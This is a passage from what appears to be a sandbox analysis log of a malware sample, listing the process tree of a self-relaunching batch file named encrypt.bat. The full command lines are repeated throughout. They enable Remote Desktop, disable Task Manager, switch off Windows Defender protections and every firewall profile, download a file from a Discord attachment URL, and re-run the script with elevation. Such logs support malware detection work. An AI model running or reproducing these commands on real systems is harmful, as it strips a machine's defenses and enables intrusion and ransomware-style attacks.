C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"57⤵PID:3808
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"58⤵PID:2372
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f58⤵PID:328
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"58⤵PID:3952
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f58⤵PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"58⤵PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"58⤵PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"58⤵PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"58⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"58⤵PID:5048
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable58⤵PID:4712
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE58⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off58⤵PID:4080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off58⤵PID:3372
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off58⤵PID:3416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off58⤵PID:3892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off58⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"58⤵PID:4856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"58⤵PID:4444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"58⤵PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"58⤵PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"58⤵PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"58⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"58⤵
- Blocklisted process makes network request
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"58⤵
- Modifies registry class
PID:1264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"59⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"60⤵PID:2500
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f60⤵PID:3876
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"60⤵PID:1940
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f60⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"60⤵PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"60⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"60⤵PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"60⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"60⤵PID:2604
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable60⤵PID:4796
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE60⤵PID:2928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off60⤵PID:3908
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off60⤵PID:4524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off60⤵PID:3736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off60⤵PID:4556
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off60⤵PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"60⤵PID:248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"60⤵PID:4656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"60⤵PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"60⤵PID:200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"60⤵PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"60⤵PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"60⤵
- Blocklisted process makes network request
PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"60⤵
- Modifies registry class
PID:4704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"61⤵PID:976
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"62⤵PID:2396
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f62⤵PID:3680
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"62⤵PID:4556
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f62⤵PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"62⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"62⤵
- Command and Scripting Interpreter: PowerShell
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"62⤵
- Command and Scripting Interpreter: PowerShell
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"62⤵PID:4152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"62⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable62⤵PID:1584
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE62⤵PID:2016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off62⤵PID:1504
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off62⤵PID:3576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off62⤵PID:1976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off62⤵PID:1356
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off62⤵PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"62⤵PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"62⤵PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"62⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"62⤵PID:1948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"62⤵PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"62⤵PID:2172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"62⤵
- Blocklisted process makes network request
PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"62⤵
- Modifies registry class
PID:2232 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"63⤵PID:1504
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"64⤵PID:1124
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f64⤵PID:4572
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"64⤵PID:3968
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f64⤵PID:3364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"64⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"64⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"64⤵
- Command and Scripting Interpreter: PowerShell
PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"64⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"64⤵
- Command and Scripting Interpreter: PowerShell
PID:2008
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable64⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE64⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off64⤵PID:1704
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off64⤵PID:4976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off64⤵PID:5056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off64⤵PID:1540
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off64⤵PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"64⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"64⤵
- Command and Scripting Interpreter: PowerShell
PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"64⤵PID:2040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"64⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"64⤵PID:900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"64⤵PID:1204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"64⤵
- Blocklisted process makes network request
PID:1992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"64⤵PID:2008
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"65⤵PID:3980
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"66⤵PID:2712
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f66⤵PID:3160
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"66⤵PID:2108
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f66⤵PID:4184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"66⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"66⤵PID:884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"66⤵PID:4288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"66⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"66⤵PID:3416
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable66⤵PID:1216
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE66⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off66⤵PID:4660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off66⤵PID:4548
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off66⤵
- Modifies Windows Firewall
PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off66⤵PID:2412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off66⤵PID:3808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"66⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"66⤵PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"66⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"66⤵PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"66⤵PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"66⤵PID:1132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"66⤵
- Blocklisted process makes network request
PID:1060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"66⤵
- Modifies registry class
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"67⤵PID:4916
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"68⤵PID:2500
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f68⤵PID:4264
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"68⤵PID:236
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f68⤵PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"68⤵PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"68⤵PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"68⤵PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"68⤵PID:1404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"68⤵PID:2904
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable68⤵PID:3568
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE68⤵PID:5100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off68⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off68⤵PID:1304
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off68⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off68⤵PID:1392
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off68⤵PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"68⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"68⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"68⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"68⤵PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"68⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"68⤵PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"68⤵
- Blocklisted process makes network request
PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"68⤵PID:4932
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"69⤵PID:3928
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"70⤵PID:2880
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f70⤵PID:5032
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"70⤵PID:4448
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f70⤵PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:4068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:1688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:4588
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable70⤵PID:3464
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE70⤵PID:4988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off70⤵
- Modifies Windows Firewall
PID:976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off70⤵PID:4524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off70⤵PID:1976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off70⤵PID:5048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off70⤵PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"70⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:2392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:3976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"70⤵
- Blocklisted process makes network request
PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"70⤵
- Modifies registry class
PID:2516 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"71⤵PID:5056
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"72⤵PID:3276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f72⤵PID:888
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"72⤵PID:4524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f72⤵PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:3264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable72⤵
- Modifies Windows Firewall
PID:1408
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE72⤵PID:2748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off72⤵PID:732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off72⤵
- Modifies Windows Firewall
PID:2912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off72⤵PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off72⤵PID:2600
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off72⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"72⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:3036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:3936
-
-
